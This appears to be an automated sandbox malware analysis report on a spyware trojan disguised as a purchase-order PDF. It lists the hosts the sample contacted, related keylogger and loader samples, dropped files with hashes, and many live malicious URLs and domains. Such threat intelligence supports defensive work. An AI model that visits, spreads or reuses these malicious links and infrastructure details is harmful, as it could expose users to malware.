188.114.97.3	reallyfreegeoip.org	European Union	13335	CLOUDFLARENETUS	false
142.250.186.174	drive.google.com	United States	15169	GOOGLEUS	false
193.122.130.0	checkip.dyndns.com	United States	31898	ORACLE-BMC-31898US	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1576421
Start date and time:	2024-12-17 03:28:04 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 1s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	6
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	PURCHASE ORDER TRC-0909718-24_pdf.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@3/8@6/5
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 83% Number of executed functions: 74 Number of non-executed functions: 68
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.246.45
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target PURCHASE ORDER TRC-0909718-24_pdf.exe, PID 7716 because it is empty
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
21:29:54	API Interceptor	43658x Sleep call for process: PURCHASE ORDER TRC-0909718-24_pdf.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
149.154.167.220	Justificante pago-09453256434687.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse
	l9IH82eiKw.exe	Get hash	malicious	Unknown	Browse
	l9IH82eiKw.exe	Get hash	malicious	Unknown	Browse
	pedido-035241.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse
	QUOTATION REQUEST - BQS058.exe	Get hash	malicious	MassLogger RAT	Browse
	FT876567090.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	REQUEST FOR QUOTATION 1307-RFQ.exe	Get hash	malicious	MassLogger RAT	Browse
	PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Get hash	malicious	VIP Keylogger	Browse
	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	SWIFT091816-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
188.114.97.3	RFQ 3100185 MAHAD.exe	Get hash	malicious	FormBook	Browse	www.rgenerousrs.store/o362/
	A2028041200SD.exe	Get hash	malicious	FormBook	Browse	www.beylikduzu616161.xyz/2nga/
	Delivery_Notification_00000260791.doc.js	Get hash	malicious	Unknown	Browse	radostdetym.ru/?ad=1JXSXybzEjjRJQDbVngTy7d8kEFAxmgmDN&id=rWoA9pTQhV1o4c5fjbOa-d26BGh3QU3-Bk0PqI4WnzM-5vl4IqKPymhrqkRpunF_PTHktMR-2qUlNAtnXA&rnd=45
	ce.vbs	Get hash	malicious	Unknown	Browse	paste.ee/d/lxvbq
	Label_00000852555.doc.js	Get hash	malicious	Unknown	Browse	tamilandth.com/counter/?ad=1GNktTwWR98eDEMovFNDqyUPsyEdCxKRzC&id=LWkA9pJQhl9uXU1kaDN-eSC-55GNxzVDsLXZhtXL8Pr1j1FTCf4XAYGxA0VCjCQra2XwotFrDHGSYxM&rnd=25
	PO 20495088.exe	Get hash	malicious	FormBook	Browse	www.ssrnoremt-rise.sbs/3jsc/
	QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	filetransfer.io/data-package/zWkbOqX7/download
	http://kklk16.bsyo45ksda.top	Get hash	malicious	Unknown	Browse	kklk16.bsyo45ksda.top/favicon.ico
	gusetup.exe	Get hash	malicious	Unknown	Browse	www.glarysoft.com/update/glary-utilities/pro/pro50/
	Online Interview Scheduling Form.lnk	Get hash	malicious	Ducktail	Browse	gmtagency.online/api/check

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
reallyfreegeoip.org	Justificante pago-09453256434687.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	104.21.67.152
	pedido-035241.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	104.21.67.152
	QUOTATION REQUEST - BQS058.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.67.152
	FT876567090.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.67.152
	REQUEST FOR QUOTATION 1307-RFQ.exe	Get hash	malicious	MassLogger RAT	Browse	172.67.177.134
	PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Get hash	malicious	VIP Keylogger	Browse	172.67.177.134
	ref_97024130865.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.67.152
	CITAS_pif.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.67.152
	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.67.152
	PURCHASE ORDER 006-2024 GIA-AV Rev 1_pdf.exe	Get hash	malicious	GuLoader	Browse	104.21.67.152
checkip.dyndns.com	Justificante pago-09453256434687.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	pedido-035241.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	193.122.6.168
	QUOTATION REQUEST - BQS058.exe	Get hash	malicious	MassLogger RAT	Browse	193.122.6.168
	FT876567090.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	REQUEST FOR QUOTATION 1307-RFQ.exe	Get hash	malicious	MassLogger RAT	Browse	158.101.44.242
	PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Get hash	malicious	VIP Keylogger	Browse	132.226.8.169
	ref_97024130865.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	193.122.130.0
	CITAS_pif.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.8.169
	conferma..exe	Get hash	malicious	MassLogger RAT	Browse	132.226.8.169
	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
api.telegram.org	Justificante pago-09453256434687.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	l9IH82eiKw.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	l9IH82eiKw.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	pedido-035241.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	QUOTATION REQUEST - BQS058.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	FT876567090.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	REQUEST FOR QUOTATION 1307-RFQ.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Get hash	malicious	VIP Keylogger	Browse	149.154.167.220
	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	SWIFT091816-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	Justificante pago-09453256434687.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	l9IH82eiKw.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	l9IH82eiKw.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	pedido-035241.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	dZKPE9gotO.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	QUOTATION REQUEST - BQS058.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	FT876567090.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	REQUEST FOR QUOTATION 1307-RFQ.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Get hash	malicious	VIP Keylogger	Browse	149.154.167.220
	nB52P46OJD.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
CLOUDFLARENETUS	https://tinyurl.com/5faazntx	Get hash	malicious	Unknown	Browse	104.18.111.161
	https://solve.jenj.org/awjxs.captcha?u=001e7d38-a1fc-47e3-ac88-6df0872bfe2d	Get hash	malicious	Unknown	Browse	104.21.16.207
	gkcQYEdJSO.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	104.21.38.84
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LiteHTTP Bot, LummaC Stealer, Stealc, Xmrig	Browse	104.21.2.110
	https://ivsmn.kidsavancados.com/	Get hash	malicious	Unknown	Browse	104.18.94.41
	https://uvcr.ovactanag.ru/jQXv/	Get hash	malicious	Unknown	Browse	104.17.25.14
	https://bgf43.bookrecce.com/vfd23ced/#sean@virtualintelligencebriefing.com	Get hash	malicious	Unknown	Browse	104.16.123.96
	https://tinyurl.com/cueen04fmfsf	Get hash	malicious	Unknown	Browse	172.67.204.38
	z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exe	Get hash	malicious	FormBook	Browse	104.21.64.208
	https://dot.itsecuritymessages.com/45sf4657dvz4hn/afc6c7/00179cbf-581d-4c00-98d3-bf1104b204ad	Get hash	malicious	Unknown	Browse	162.159.128.61
ORACLE-BMC-31898US	end.exe	Get hash	malicious	Unknown	Browse	130.61.86.87
	Justificante pago-09453256434687.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	pedido-035241.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	QUOTATION REQUEST - BQS058.exe	Get hash	malicious	MassLogger RAT	Browse	193.122.6.168
	FT876567090.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	REQUEST FOR QUOTATION 1307-RFQ.exe	Get hash	malicious	MassLogger RAT	Browse	158.101.44.242
	ref_97024130865.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	193.122.130.0
	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	PURCHASE ORDER 006-2024 GIA-AV Rev 1_pdf.exe	Get hash	malicious	GuLoader	Browse	158.101.44.242
	SWIFT091816-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	193.122.6.168

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	Justificante pago-09453256434687.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	pedido-035241.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	QUOTATION REQUEST - BQS058.exe	Get hash	malicious	MassLogger RAT	Browse	188.114.97.3
	FT876567090.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	REQUEST FOR QUOTATION 1307-RFQ.exe	Get hash	malicious	MassLogger RAT	Browse	188.114.97.3
	PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Get hash	malicious	VIP Keylogger	Browse	188.114.97.3
	ref_97024130865.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	188.114.97.3
	CITAS_pif.exe	Get hash	malicious	MassLogger RAT	Browse	188.114.97.3
	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	PURCHASE ORDER 006-2024 GIA-AV Rev 1_pdf.exe	Get hash	malicious	GuLoader	Browse	188.114.97.3
3b5074b1b5d032e5620f69f9f700ff0e	drivers.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	GameBoxMini.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	drivers.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	Justificante pago-09453256434687.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	https://docsend.com/v/ty7vw/up-date	Get hash	malicious	Unknown	Browse	149.154.167.220
	3gJQoqWpxb.bat	Get hash	malicious	Unknown	Browse	149.154.167.220
	uZgbejeJkT.bat	Get hash	malicious	Unknown	Browse	149.154.167.220
	ni2OwV1y9u.bat	Get hash	malicious	Unknown	Browse	149.154.167.220
	l9IH82eiKw.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	3gJQoqWpxb.bat	Get hash	malicious	Unknown	Browse	149.154.167.220
37f463bf4616ecd445d4a1937da06e19	file.exe	Get hash	malicious	ScreenConnect Tool, Amadey, RHADAMANTHYS, XWorm, Xmrig	Browse	142.250.185.193 142.250.186.174
	Justificante pago-09453256434687.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	142.250.185.193 142.250.186.174
	ME-SPC-94.03.60.175.07.exe	Get hash	malicious	GuLoader	Browse	142.250.185.193 142.250.186.174
	09-FD-94.03.60.175.07.xlsx.exe	Get hash	malicious	GuLoader	Browse	142.250.185.193 142.250.186.174
	TEC-SPC-94.03.60.175.07.exe	Get hash	malicious	GuLoader	Browse	142.250.185.193 142.250.186.174
	ME-SPC-94.03.60.175.07.exe	Get hash	malicious	GuLoader	Browse	142.250.185.193 142.250.186.174
	09-FD-94.03.60.175.07.xlsx.exe	Get hash	malicious	GuLoader	Browse	142.250.185.193 142.250.186.174
	TEC-SPC-94.03.60.175.07.exe	Get hash	malicious	GuLoader	Browse	142.250.185.193 142.250.186.174
	pedido-035241.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	142.250.185.193 142.250.186.174
	dZKPE9gotO.exe	Get hash	malicious	Vidar	Browse	142.250.185.193 142.250.186.174

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\nsiEA09.tmp\System.dll	SWIFT091816-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	SWIFT09181-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	O0rhQM49FL.exe	Get hash	malicious	Unknown	Browse
	O0rhQM49FL.exe	Get hash	malicious	GuLoader	Browse
	5WP9WCM8qV.exe	Get hash	malicious	GuLoader	Browse
	5WP9WCM8qV.exe	Get hash	malicious	GuLoader	Browse
	K8ZvbdkrGx.exe	Get hash	malicious	GuLoader	Browse
	K8ZvbdkrGx.exe	Get hash	malicious	GuLoader	Browse
	JOSXXL1.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving\Fasciculi\wildwestfilm.sto

Download File

Process:	C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe
File Type:	data
Category:	dropped
Size (bytes):	363811
Entropy (8bit):	1.2512349423386382
Encrypted:	false
SSDEEP:	768:y2f405GRYtnSLOBbyCociR2TVuEpHsVURGxwGmXjyMB+CtKDOgt9rlHF1QOs+9m5:pIuagbnK7CwVwFpYogwhUsvCq
MD5:	BFEA15C03AB295424981A73637A19491
SHA1:	A5ADABDDC373D6B3004F96946D84B651E42D9F5C
SHA-256:	83E9CE74259889DCABD39D41131F286882B224698DCDEB8D0B4074069AAA687B
SHA-512:	CB5969BFFAED8AF1791938E924E0CC9F876E45165F4E7EA5E9249131FACA831C0600F14BD68EF041D18C81A3FBE087970043D1B3B8A6786C1E5E5049834D4D0D
Malicious:	false
Reputation:	low
Preview:	...................................................E....................................j.A..(.......................................+..........................$.............................................z.L........%......t...................................2l.............1.............................................................................U...g.......................`............................................................0..................................J......................................K...R...............................................................&...c......................................S......!...8..................Y......................................................>u........T...................L........................................................................0.........................................W.....L.n.....................................$.b...........B..................................................8...............!...............

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving\Mixoploid189\forskansningens.txt

Download File

Process:	C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe
File Type:	ASCII text, with very long lines (345), with no line terminators
Category:	dropped
Size (bytes):	345
Entropy (8bit):	4.241929841155785
Encrypted:	false
SSDEEP:	6:dvkdMOL4xnuXGNQWjMIDw1luhPB46xAJX7sBJOdkmLA8gMfArpIXbgOwQWiQJEEC:dufExIoDe1lYnGJLsBQdtL6rpIrWQkJA
MD5:	AE69FE0F4D1E1115BC470031E661785C
SHA1:	8D3799826FE457C61C1E8EE5E3071683A8125BC5
SHA-256:	6B18768503395C809263568D3A8858810404C2B7D49DC7CB6CE5F717F5D6C7DE
SHA-512:	969C0DB048EAC4A9B447A0C0C463A7983F1B4091B6206E274B9D249F8311439B6C33F5AA1EDF9CD1AA27502DA49378D3E1B45F16909C55DF830E51684E9648BE
Malicious:	false
Reputation:	low
Preview:	pandas omflakkendes tribrachic miskenning.nonvitally subcase syvendelens weighin.tilhreres lysed metencephalons aabentstaaendes arbejdsmarkedsstyrelsers.kodeskrifter indgaaet nstnederst desulphurise badevgtene caliche.reabsorption erhvervskommunernes aktuarerne ammunition whilere sughs.tusindaarigt barkers landholders butylation phrenicocolic.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving\Mixoploid189\fyldebtten.soi

Download File

Process:	C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe
File Type:	Matlab v4 mat-file (little endian) ', numeric, rows 63, columns 0
Category:	dropped
Size (bytes):	210366
Entropy (8bit):	1.240975322465592
Encrypted:	false
SSDEEP:	768:vBTwJOLxCIF0V6iLboHog6BQlsMqlN1R0pmGy30wbfq6+9GmlsNh34k0uJ/QohER:cJigyyDJnLH7zA
MD5:	AEF78D8D561E8802286A78AAC6C73ED6
SHA1:	DDF5DA649482D0A553802827BB9F0EF64A7069E1
SHA-256:	45F24543C01C9A11CC2246A9B27569AF433EEF61C877A4E191B683315D3566BE
SHA-512:	93D43C0CECADF8E1F507F8E58D2B4D92995D8F7ECF213A23559938B380033A6D0D80B0816A8D6603864F821F4FEDC988E0F79BE14C6892089178970E08DC4199
Malicious:	false
Reputation:	low
Preview:	....?...........*=..'...........................m........................y............................................................................H.......................................c.......x........................................................:...s.......................+.........................................~.....2........C..Z...................................k............................i.........................................{...............................................?%............................................................................Z................................v.............<.....'.............L..........................................+...............................s.........................................W........................`........................[..............&..................T................................j......M......[.....................c.............................................9.......................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving\Ozena.Soc

Download File

Process:	C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe
File Type:	data
Category:	dropped
Size (bytes):	301328
Entropy (8bit):	7.7592745368614455
Encrypted:	false
SSDEEP:	6144:yzRyNCuHDSKdjLFdwAHj8Si2OjiRSLSgWEbExRcSwONrvquzJk8axhiLiV:Wy9HDDdESiljs8RoxNwOJRzJk8a2L6
MD5:	0076E7A472C5E8B779E86291C0297C32
SHA1:	20F39E6159F72DEF9727898C72F7297165A8FC5D
SHA-256:	2DBBC59173FBC061C8A43C5781B63EF9ECFDE64EC53AA7276E732C37791944DF
SHA-512:	7A48E44053C16A9A2852A7BED1BEA50A9672DCD736EA9CEDBB270389D9DEE2120E851BB8D66B81BE7E773BC58FB00A14D3C3D8FC5DEEAC65E2E21ACBF8844545
Malicious:	false
Reputation:	low
Preview:	....=........**...z......................i.........S.XXX...........gg..........kkkkkk.......~~~~....................... ...''..............9........NNNN....................d..OOO.!..............%.... ............?.....66....................................9...>>>..............................................).}.......................vv.......L....hhh..................w.....kkkkk...........s..................................^.............DD........).......4.....................hh..........d.......%...........YYYY.......P.....O......M..W..%...o....====...........Q........11.........11.......""".........^^^^^^............k........`..c.vvvvvvvvvv...........xxx.....s..................DD...R.........88.........:.....!!..mm..xx................:....//....8.`.HH.....................{{.Z......#.........88..........I.#......"....n....7...aa....................**....>>...................UU....................-....................5.......J.vv..ww...JJJJJJ..___....2....//.........b.FF.111....QQ

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving\Riprap43.gaw

Download File

Process:	C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe
File Type:	data
Category:	dropped
Size (bytes):	56641
Entropy (8bit):	1.2318917163845036
Encrypted:	false
SSDEEP:	384:vrBeaW6xu5Pd9GW0Zq+/HXF1qcGNMUd8phxiFQHOV7hpvZlq:t9+Pdop/306xixrlq
MD5:	39C9A5F767D8C170B5CE38EA8D5734D4
SHA1:	4B4CA81EB3D093645B504004F62A269D4EACDECC
SHA-256:	87A7017021050071DBE5726BF9AC505763CD923E2BDE93336CA0905802CD8D49
SHA-512:	AE2D66B801251046FA4D3093391B916955B43BE75A954DD398583B1B8881A9F109F51F81D6E4FE759F83AC7B921FA89B02185013AFDE16D3C8EAB422BE89B4FF
Malicious:	false
Reputation:	low
Preview:	.............l.........z........i........8.........................m.........f.C.Z..............I./........T..1.......................!......................D.................................................................................U................................../........................................-.......................}.........T`.....0@.............................F..............................].........................L.........<.........................................................................................N......................................................x........................................................@............................................4..........'...................?..........I.............../....................L....,...............................................;......k.....................................i............4.......................................K.....7...7....c...................U..#..............................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving\kasteskyts.Mor

Download File

Process:	C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe
File Type:	data
Category:	dropped
Size (bytes):	114032
Entropy (8bit):	4.628231683472205
Encrypted:	false
SSDEEP:	1536:ZjIgUXSEWfrdXfassi3GU/y/G8MfgJXZ4mh0DG2TJk6OW:ZEgS6rWK8rbYL/
MD5:	43653F2E823BAB8F017387619AA400F9
SHA1:	1ACF64525250DA5928F26E4219EAEFACC006E483
SHA-256:	BD50AEBCD64EB5AB248BB5C34C75B8E56D3193E07A33469A99ABBE2901AF4AE2
SHA-512:	8AA30DA2743F67BD419EA0524E4E6D145CA96401957FD5692C901B54C69B041DCDF79B3F0CEE06A8DCB564E608428842EC32513E3FE551F89F356412F8CD055D
Malicious:	false
Preview:	..........................hhhh.....NNNNNNNN...]]..............ll........._...............................}}.%....L......................H.s........==.......;.``.............ddddd......-..."...............ii.......>.S.....*..............h......................KKK..........4.............U......G...0000000....KKK....................6........%%.qqq................................n..EEE..%..SSSSS..........S.444............kk............;;;;........aa........ee....ii.......L.......O..SSS.TT..}}...........................OOOO.................&............,..........$$.`..;;;.CCC.HH.d.............e...gg..................."""............H...............1.G.MMMM....+........................b."........__..................................F................yyyy.........................x.fff...................\\...m...7.....\...&.............u............-.......``.....`........................222......3.3.n..D....................++++.....AA.w........\\...TT..........}}.....................LL......nn

C:\Users\user\AppData\Local\Temp\nsiEA09.tmp\System.dll

Download File

Process:	C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	11776
Entropy (8bit):	5.655335921632966
Encrypted:	false
SSDEEP:	192:eF24sihno00Wfl97nH6T2enXwWobpWBTU4VtHT7dmN35Ol9Sl:h8QIl975eXqlWBrz7YLOl9
MD5:	EE260C45E97B62A5E42F17460D406068
SHA1:	DF35F6300A03C4D3D3BD69752574426296B78695
SHA-256:	E94A1F7BCD7E0D532B660D0AF468EB3321536C3EFDCA265E61F9EC174B1AEF27
SHA-512:	A98F350D17C9057F33E5847462A87D59CBF2AAEDA7F6299B0D49BB455E484CE4660C12D2EB8C4A0D21DF523E729222BBD6C820BF25B081BC7478152515B414B3
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Joe Sandbox View:	Filename: SWIFT091816-24_pdf.exe, Detection: malicious, Browse Filename: REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, Detection: malicious, Browse Filename: SWIFT09181-24_pdf.exe, Detection: malicious, Browse Filename: O0rhQM49FL.exe, Detection: malicious, Browse Filename: O0rhQM49FL.exe, Detection: malicious, Browse Filename: 5WP9WCM8qV.exe, Detection: malicious, Browse Filename: 5WP9WCM8qV.exe, Detection: malicious, Browse Filename: K8ZvbdkrGx.exe, Detection: malicious, Browse Filename: K8ZvbdkrGx.exe, Detection: malicious, Browse Filename: JOSXXL1.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1...u.u.u...s.u.a....r.!..q....t....t.Richu.........................PE..L...]..V...........!..... ...........'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..S....0.......$..............@..@.data...x....@.......(..............@....reloc..b....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\Benchership141.lnk

Download File

Process:	C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe
File Type:	MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hide
Category:	dropped
Size (bytes):	1176
Entropy (8bit):	3.26766291921788
Encrypted:	false
SSDEEP:	12:8wl0asXowAOcQ/tz0/CSL6/cBnwgXl341DEDeG41DEDW2RKQ1olfW+kjcmAaUGGI:8xLDWLrFPjPK29izZMUEpdqy
MD5:	F18346D4B0043E2093BA7D295B5A8105
SHA1:	CAF68803CEB0A092EABB50C87F2BB650AFC9EEDA
SHA-256:	0F43F66F718B93A28C4191F812067F1B323DE88C71DC427FE905827ADDCC7AE1
SHA-512:	9A0092150DF5156B3712441B7501F59056CC38553B6842B29EA4B1D79A53A86A0CCB89D723F57007791049AB5955DC29054804887B3B8B84E6DA076EB3106CC5
Malicious:	false
Preview:	L..................F........................................................m....P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....P.1...........user.<............................................j.o.n.e.s.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....V.1...........Roaming.@............................................R.o.a.m.i.n.g.....b.1...........mindevrdigt.H............................................m.i.n.d.e.v.r.d.i.g.t.......2...........boghandlermedhjlperens.tor..f............................................b.o.g.h.a.n.d.l.e.r.m.e.d.h.j.l.p.e.r.e.n.s...t.o.r...*.../.....\.....\.....\.m.i.n.d.e.v.r.d.i.g.t.\.b.o.g.h.a.n.d.l.e.r.m.e.d.h.j.l.p.e.r.e.n.s...t.o.r.Y.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s.\.I.N.e.t.C.a.c.h.e.\.r.a.p.i.d.i.t.e.t.e.n.s.\.f.r.e.m.t.v.i.n.g.\.F.a.s.c.i.c.u.l.i.............y............

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.964736299838112
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	PURCHASE ORDER TRC-0909718-24_pdf.exe
File size:	491'585 bytes
MD5:	95611e69a35eafc00725b14abcc7cc1a
SHA1:	ce2e851da7726a726c4232463cf2ddd2e96ab27d
SHA256:	e6a47a3ccdb6e669409024f10c2d1ebddb97d93b8c8eda17055ba377207f62a0
SHA512:	e611d019cc3a17b3147cc3dd1db00d99c1144aaf34da7377d08a857c5ac756647f888c1e19eec79ab1ef4da0fbb9516a93cda259d3312e267452274839bdb71f
SSDEEP:	12288:I5A4EITYTsh417z6mmCke3aSiEshadOu7Jj1JK8s5FEeK/:Z4fTbSvxkBS/6adOu7Jj1Jicea
TLSH:	49A4230122719273D97707320D267EEAFA7EF91A47604F0283641E8C39717F5ED2E9A9
